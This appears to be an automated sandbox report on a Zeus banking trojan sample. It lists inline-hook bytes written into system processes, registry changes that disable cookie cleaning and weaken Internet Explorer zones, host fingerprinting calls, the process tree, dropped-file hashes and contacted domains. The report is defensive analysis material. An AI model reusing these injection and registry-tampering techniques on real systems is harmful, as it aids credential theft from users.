Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5300A0 value: 8B FF 55 8B EC E9 48 17 A8 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5300C2 value: 8B FF 55 8B EC E9 92 BA A8 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5300CC value: 8B FF 55 8B EC E9 06 90 AA 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5300D6 value: 8B FF 55 8B EC E9 F1 3B AB 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5300E0 value: 8B FF 55 8B EC E9 B6 3D AB 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5300EA value: 8B FF 55 8B EC E9 8B 3A AB 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5300F4 value: 8B FF 55 8B EC E9 40 33 AB 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5300FE value: 8B FF 55 8B EC E9 D7 42 A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530108 value: 8B FF 55 8B EC E9 D1 40 AB 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530112 value: 8B FF 55 8B EC E9 04 27 A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 53011C value: 8B FF 55 8B EC E9 04 E1 A8 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530126 value: 8B FF 55 8B EC E9 00 20 A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530130 value: 8B FF 55 8B EC E9 C3 5F A8 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 53016C value: 8B FF 55 8B EC E9 E4 6E A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530176 value: 8B FF 55 8B EC E9 EA C0 A8 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530180 value: 8B FF 55 8B EC E9 EF 3E AB 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530196 value: 8B FF 55 8B EC E9 FD BF A8 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5301A0 value: 8B FF 55 8B EC E9 33 C0 AC 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5301CA value: 8B FF 55 8B EC E9 C8 8D A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5301D4 value: 8B FF 55 8B EC E9 96 26 A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5301DE value: 8B FF 55 8B EC E9 D2 8F A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5301E8 value: 8B FF 55 8B EC E9 C5 2C A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5301F2 value: 8B FF 55 8B EC E9 18 8F A9 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 5301FC value: 8B FF 55 8B EC E9 46 49 AA 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530206 value: 8B FF 55 8B EC E9 55 0B ED 74
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 71000A value: 8B FF 55 8B EC E9 A6 F5 A7 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710014 value: 8B FF 55 8B EC E9 34 5F 54 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 71001E value: 8B FF 55 8B EC E9 90 EE 6E 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710028 value: 8B FF 55 8B EC E9 47 05 76 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710032 value: 8B FF 55 8B EC E9 0D 8E 70 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 71003C value: 8B FF 55 8B EC E9 4D 04 76 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710046 value: 8B FF 55 8B EC E9 F3 C7 6E 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710050 value: 8B FF 55 8B EC E9 0F E2 6E 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 71005A value: 8B FF 55 8B EC E9 BA 12 71 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710064 value: 8B FF 55 8B EC E9 62 41 6F 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 71006E value: 8B FF 55 8B EC E9 4F CB 6E 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710078 value: 8B FF 55 8B EC E9 70 3B C1 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710082 value: 8B FF 55 8B EC E9 41 C4 C1 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 71008C value: 8B FF 55 8B EC E9 16 68 C1 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7100A0 value: 8B FF 55 8B EC E9 48 17 8A 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7100C2 value: 8B FF 55 8B EC E9 92 BA 8A 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7100CC value: 8B FF 55 8B EC E9 06 90 8C 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7100D6 value: 8B FF 55 8B EC E9 F1 3B 8D 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7100E0 value: 8B FF 55 8B EC E9 B6 3D 8D 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7100EA value: 8B FF 55 8B EC E9 8B 3A 8D 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7100F4 value: 8B FF 55 8B EC E9 40 33 8D 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7100FE value: 8B FF 55 8B EC E9 D7 42 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710108 value: 8B FF 55 8B EC E9 D1 40 8D 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710112 value: 8B FF 55 8B EC E9 04 27 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 71011C value: 8B FF 55 8B EC E9 04 E1 8A 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710126 value: 8B FF 55 8B EC E9 00 20 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710130 value: 8B FF 55 8B EC E9 C3 5F 8A 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 71016C value: 8B FF 55 8B EC E9 E4 6E 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710176 value: 8B FF 55 8B EC E9 EA C0 8A 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710180 value: 8B FF 55 8B EC E9 EF 3E 8D 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710196 value: 8B FF 55 8B EC E9 FD BF 8A 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7101A0 value: 8B FF 55 8B EC E9 33 C0 8E 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7101CA value: 8B FF 55 8B EC E9 C8 8D 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7101D4 value: 8B FF 55 8B EC E9 96 26 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7101DE value: 8B FF 55 8B EC E9 D2 8F 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7101E8 value: 8B FF 55 8B EC E9 C5 2C 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7101F2 value: 8B FF 55 8B EC E9 18 8F 8B 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 7101FC value: 8B FF 55 8B EC E9 46 49 8C 76
Source: C:\Windows\System32\WinSAT.exe	Memory written: PID: 1352 base: 710206 value: 8B FF 55 8B EC E9 55 0B CF 74
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E000A value: 8B FF 55 8B EC E9 A6 F5 FA 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0014 value: 8B FF 55 8B EC E9 34 5F A7 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E001E value: 8B FF 55 8B EC E9 90 EE C1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0028 value: 8B FF 55 8B EC E9 47 05 C9 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0032 value: 8B FF 55 8B EC E9 0D 8E C3 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E003C value: 8B FF 55 8B EC E9 4D 04 C9 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0046 value: 8B FF 55 8B EC E9 F3 C7 C1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0050 value: 8B FF 55 8B EC E9 0F E2 C1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E005A value: 8B FF 55 8B EC E9 BA 12 C4 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0064 value: 8B FF 55 8B EC E9 62 41 C2 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E006E value: 8B FF 55 8B EC E9 4F CB C1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0078 value: 8B FF 55 8B EC E9 70 3B 14 77
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0082 value: 8B FF 55 8B EC E9 41 C4 14 77
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E008C value: 8B FF 55 8B EC E9 16 68 14 77
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E00A0 value: 8B FF 55 8B EC E9 48 17 DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E00C2 value: 8B FF 55 8B EC E9 92 BA DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E00CC value: 8B FF 55 8B EC E9 06 90 DF 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E00D6 value: 8B FF 55 8B EC E9 F1 3B E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E00E0 value: 8B FF 55 8B EC E9 B6 3D E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E00EA value: 8B FF 55 8B EC E9 8B 3A E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E00F4 value: 8B FF 55 8B EC E9 40 33 E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E00FE value: 8B FF 55 8B EC E9 D7 42 DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0108 value: 8B FF 55 8B EC E9 D1 40 E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0112 value: 8B FF 55 8B EC E9 04 27 DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E011C value: 8B FF 55 8B EC E9 04 E1 DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0126 value: 8B FF 55 8B EC E9 00 20 DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0130 value: 8B FF 55 8B EC E9 C3 5F DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E016C value: 8B FF 55 8B EC E9 E4 6E DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0176 value: 8B FF 55 8B EC E9 EA C0 DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0180 value: 8B FF 55 8B EC E9 EF 3E E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0196 value: 8B FF 55 8B EC E9 FD BF DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E01A0 value: 8B FF 55 8B EC E9 33 C0 E1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E01CA value: 8B FF 55 8B EC E9 C8 8D DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E01D4 value: 8B FF 55 8B EC E9 96 26 DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E01DE value: 8B FF 55 8B EC E9 D2 8F DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E01E8 value: 8B FF 55 8B EC E9 C5 2C DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E01F2 value: 8B FF 55 8B EC E9 18 8F DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E01FC value: 8B FF 55 8B EC E9 46 49 DF 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 2072 base: 1E0206 value: 8B FF 55 8B EC E9 55 0B 22 75
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 26000A value: 8B FF 55 8B EC E9 A6 F5 F2 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260014 value: 8B FF 55 8B EC E9 34 5F 9F 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 26001E value: 8B FF 55 8B EC E9 90 EE B9 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260028 value: 8B FF 55 8B EC E9 47 05 C1 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260032 value: 8B FF 55 8B EC E9 0D 8E BB 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 26003C value: 8B FF 55 8B EC E9 4D 04 C1 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260046 value: 8B FF 55 8B EC E9 F3 C7 B9 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260050 value: 8B FF 55 8B EC E9 0F E2 B9 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 26005A value: 8B FF 55 8B EC E9 BA 12 BC 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260064 value: 8B FF 55 8B EC E9 62 41 BA 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 26006E value: 8B FF 55 8B EC E9 4F CB B9 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260078 value: 8B FF 55 8B EC E9 70 3B 0C 77
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260082 value: 8B FF 55 8B EC E9 41 C4 0C 77
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 26008C value: 8B FF 55 8B EC E9 16 68 0C 77
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2600A0 value: 8B FF 55 8B EC E9 48 17 D5 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2600C2 value: 8B FF 55 8B EC E9 92 BA D5 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2600CC value: 8B FF 55 8B EC E9 06 90 D7 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2600D6 value: 8B FF 55 8B EC E9 F1 3B D8 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2600E0 value: 8B FF 55 8B EC E9 B6 3D D8 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2600EA value: 8B FF 55 8B EC E9 8B 3A D8 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2600F4 value: 8B FF 55 8B EC E9 40 33 D8 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2600FE value: 8B FF 55 8B EC E9 D7 42 D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260108 value: 8B FF 55 8B EC E9 D1 40 D8 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260112 value: 8B FF 55 8B EC E9 04 27 D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 26011C value: 8B FF 55 8B EC E9 04 E1 D5 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260126 value: 8B FF 55 8B EC E9 00 20 D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260130 value: 8B FF 55 8B EC E9 C3 5F D5 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 26016C value: 8B FF 55 8B EC E9 E4 6E D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260176 value: 8B FF 55 8B EC E9 EA C0 D5 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260180 value: 8B FF 55 8B EC E9 EF 3E D8 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260196 value: 8B FF 55 8B EC E9 FD BF D5 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2601A0 value: 8B FF 55 8B EC E9 33 C0 D9 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2601CA value: 8B FF 55 8B EC E9 C8 8D D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2601D4 value: 8B FF 55 8B EC E9 96 26 D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2601DE value: 8B FF 55 8B EC E9 D2 8F D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2601E8 value: 8B FF 55 8B EC E9 C5 2C D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2601F2 value: 8B FF 55 8B EC E9 18 8F D6 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 2601FC value: 8B FF 55 8B EC E9 46 49 D7 76
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 4008 base: 260206 value: 8B FF 55 8B EC E9 55 0B 1A 75

Lowering of HIPS / PFW / Operating System Security Settings:

May initialize a security null descriptor

Show sources

Source: Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Disables Internet Explorer cookie cleaning (a user can no longer delete cookies)

Show sources

Source: C:\Windows\System32\taskhost.exe

Key value created or modified: HKEY_USERS\Software\Microsoft\Internet Explorer\Privacy CleanCookies

Modifies Internet Explorer zone settings

Show sources

Source: C:\Windows\System32\taskhost.exe	Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406
Source: C:\Windows\System32\taskhost.exe	Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609
Source: C:\Windows\System32\taskhost.exe	Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406
Source: C:\Windows\System32\taskhost.exe	Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003CD64B PFXImportCertStore,GetSystemTime,

0_2_003CD64B

Contains functionality to query the account / user name

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003B6010 GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

0_2_003B6010

Contains functionality to query time zone information

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C34E5 GetTimeZoneInformation,

0_2_003C34E5

Contains functionality to query windows version

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003B70A6 GetVersionExW,GetNativeSystemInfo,

0_2_003B70A6

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\taskhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the installation date of Windows

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the installation date of Windows

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Queries the product ID of Windows

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\cmd.exe

Qeruies volume information: C:\ VolumeInformation

Yara Overview

No Yara matches

Screenshot

Startup

system is w7

Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe (PID: 3684 MD5: 4D08934BD040ED25DFA46542E396CB05)

madog.exe (PID: 3700 MD5: 7E7B95B944D3FD8A2AA8EEA7CE4B19BF)

taskhost.exe (PID: 1292 MD5: 8F4F5A5C1BAE72CE6EAEEA1CA3F98CA2)

dwm.exe (PID: 2020 MD5: 505BF4D1CADEB8D4F8BCD08D944DE25D)

explorer.exe (PID: 2032 MD5: 2626FC9755BE22F805D3CFA0CE3EE727)

conhost.exe (PID: 1132 MD5: 29D9FCDF65B7C823688A035937BB6697)

taskhost.exe (PID: 540 MD5: 8F4F5A5C1BAE72CE6EAEEA1CA3F98CA2)

WinSAT.exe (PID: 1352 MD5: 800C5B51F0FB6E2183FB0D41E2B74EB9)

conhost.exe (PID: 2072 MD5: 29D9FCDF65B7C823688A035937BB6697)

cmd.exe (PID: 4008 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\tmp02840f01.bat MD5: 8AE6DD9A6D246004DA047F704F0CC487)

cleanup

Created / dropped Files

File Path	Type and Hashes
C:\Users\admin\AppData\Local\Temp\TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp	Type: data MD5: E3896467DF38133E6F51BF928AD5182B SHA: DC18488CB61C183300BBFB7455243E540E775B8D SHA-256: 5627937A91B338B2636807B4941398616B95AAD0ADCB1ABF4665F71A0509612F SHA-512: A623A713D8E3CBA13A95F0C79F93E67DD306B247B9E50295F5188ADB5B5DB2740FBE1FC47F600E13347E7AE89498081A388B9043E0485E5C16785383D07CF4B9
C:\Users\admin\AppData\Local\Temp\tmp02840f01.bat	Type: DOS batch file, ASCII text, with CRLF line terminators MD5: 036C2F7E5A28A1E58A766FD0D7510DB0 SHA: 0CCFB2451968778F960C6C8DAC9FEEABE9FC8B7B SHA-256: 5DA1E011A64FB3F334D6A18EB7A13E5083185D0BCE9C98BCDD078A929B43BC7B SHA-512: 294A3A994C904E8DA3D2120DE0B468BDE66EC8D8B77EFB50CAD00509250ED37193A211FE0949AEDB95EBAE2B8C8003DEDE6DA1D3861712054E62E4FA0E0CF1AF
C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Type: MS-DOS executable MD5: 7E7B95B944D3FD8A2AA8EEA7CE4B19BF SHA: 748C16771E2CBA9F030D9CB6C9E7566D6281BB39 SHA-256: 705140D7A8E4AAE9AB13055AE00E2C595DEF3038AE68FE89358A4E18B9DFF1C9 SHA-512: 46046A9F02E77CF9FBA70404C8FFFDB78F8FA72C71EE5FCD69D373071257D010D33012C4FEBBFA8A67272D14A84F5BF597F019F912FAEFB1A13C6E6C35CB5FB6
C:\Users\admin\AppData\Roaming\Yfheor\vyyno.agx	Type: data MD5: BBC804AE661C2EC8A07C11DE8076F2CB SHA: 6A865013FC98FFDC953A6E255024F86DA9B5ABA8 SHA-256: 8DFD1ECAB6150D69A365BB273CFCE04FF1E18532382ADACEE1B7571B444A6D20 SHA-512: 586E76F1FFFB61D99E110942EC52643AD9C6DA10ABB391D47FA8C4B00D3877A8B55F235E40F14371F56E2C7C329391797C11A7F9B094316B954F5BEAB419BBA4
C:\Users\admin\AppData\Roaming\Yfheor\vyyno.tmp (copy)	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Windows\Performance\WinSAT\DataStore\2015-02-05 14.55.11.358 Cpu.Assessment (Recent).WinSAT.xml	Type: XML document, Little-endian UTF-16 Unicode text, with very long lines, with no line terminators MD5: 9E1B709BCD8D1ADFC7986A1CB3CE9815 SHA: 1089528ADFD5AFE1ED90A067EC9F4F457FC2598D SHA-256: 3CB39FA29266E880EB4B1763DACD8E37E58A0D9D22A2ABFB6F7BB05FDE3D7C5A SHA-512: 91423EC695CBBD339820425148B5F82C4C1B6BCD16F04EECAF761E993FC89B79743BAD6E297120BAFBAF63594BD5848A4A0D4771389E56E628C4984876EE70A2
C:\Windows\Performance\WinSAT\DataStore\2015-02-05 14.55.11.358 DWM.Assessment (Recent).WinSAT.xml	Type: XML document, Little-endian UTF-16 Unicode text, with very long lines, with no line terminators MD5: 18342581FE92582BE0137E6F0AFDAB38 SHA: 65FDE343D6E16CFB815F22D973FBFFA2B34E9891 SHA-256: 48EFA081E933C4C8BF6B620793B41A5467A1CC990815D777435A148FE63AC337 SHA-512: D9E20281962F98C27274CB01369022E68386848E8D97E44883DF91213790FBBFEBC30CA984D3A14F44F8F50F779D0E6E887B5FC4639817D400989EB740273890
C:\Windows\Performance\WinSAT\DataStore\2015-02-05 14.55.11.358 Disk.Assessment (Recent).WinSAT.xml	Type: XML document, Little-endian UTF-16 Unicode text, with very long lines, with no line terminators MD5: 89BEBCB9CC2A784E02A3C9E9DA21CA90 SHA: E660B0A2CEC9F0BDAF479C35AD51D0EC016FF731 SHA-256: 491BB2C35DD9223476C4ED75436310F235238132CF7DAA26E1F8D14EA0FC7D72 SHA-512: 803E20CBFC21AF4352E5967D75F4E7CA9BC22809E6A7A4CBC4C4495347C8DC59751588FA8F4342DEE7A3D298C05F16F210AEF4CEC25063E0A61EB3BE26E96C36
C:\Windows\Performance\WinSAT\DataStore\2015-02-05 14.55.11.358 Graphics3D.Assessment (Recent).WinSAT.xml	Type: XML document, Little-endian UTF-16 Unicode text, with very long lines, with no line terminators MD5: FC970EA6EDEF0511CAC59A643E80E699 SHA: 093FC58C9931E9F3B323E2EF01A8FD663E0A95E2 SHA-256: 01366F5AE3212219D4001305F770010AA59ED1CCB1BD987C7F1D25182BC99379 SHA-512: 663598500665F8D54C69872252DF21F508EDD529AD01DD3D461E7A76ED1996952FF103CCA779005CE5F3891D16B9C9397883A786C401E090F42F9C1DAD24F564
C:\Windows\Performance\WinSAT\DataStore\2015-02-05 14.55.11.358 GraphicsMedia.Assessment (Recent).WinSAT.xml	Type: XML document, Little-endian UTF-16 Unicode text, with very long lines, with no line terminators MD5: 48D898E77F21816646D8390C14D88041 SHA: 63A03C794D6FCACA99B200F27B9319670368C1D8 SHA-256: 73FA6DABCD91B42CCF776FFE0F8A10F624FBE0EDD44E376ED20081A9E20315D2 SHA-512: 133E6AE1713E8B8D18CA94C1755058DA3CC86110C5AADAAF0CCF6909573DD52505D1F10FE2D2D662333D80923F7989B8E1614EBB9B05A8D9621F7DB83534D884
C:\Windows\Performance\WinSAT\DataStore\2015-02-05 14.55.11.358 Mem.Assessment (Recent).WinSAT.xml	Type: XML document, Little-endian UTF-16 Unicode text, with very long lines, with no line terminators MD5: D5C150FB51F19CFE4D5CDADE4A59D420 SHA: 7D87AE6265D3699399592556BE6F34EA7A6711F5 SHA-256: A61C6AEAF8114D1E58EB5DE81AC1BB45D4802E7E517EEFA586688723B0D9DB43 SHA-512: EDEB56CD90D0C46FDC7E3C6614BC856A4E99C7FF8FC1E44A962C2EE7D3AA4065834F9C294275A6A858537C5D42C948029FB8346C94E1E71904C4DF8511730764
C:\Windows\Performance\WinSAT\winsat.log	Type: ASCII English text, with CRLF line terminators MD5: 6E8FF58996EBCEDC33E00FB210C8D8F9 SHA: 8177E78A01BC6B27CE4F49DA67055EB4A42EEFCC SHA-256: B4D94DD653579E520756A42BDD29FC9E60EBEEEFCEBCE8D008096C6B1424C876 SHA-512: E100F57C04008E2220B03950AD0966325C1DA1E8993D3C71FB704B298A7D5585C912FA2F4180DBE0D6AB35E5DA8A9540D2CDE7B72BFE5820D722B78829ACF9B0

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Name Server	Active	Registrar	e-Mail
www.microsoft.com	23.2.52.54	unknown	true	unknown	unknown
ocsp.verisign.com	23.43.139.27	unknown	true	unknown	unknown
crl.microsoft.com	80.239.247.17	unknown	true	unknown	unknown
www.download.windowsupdate.com	93.158.110.250	unknown	true	unknown	unknown
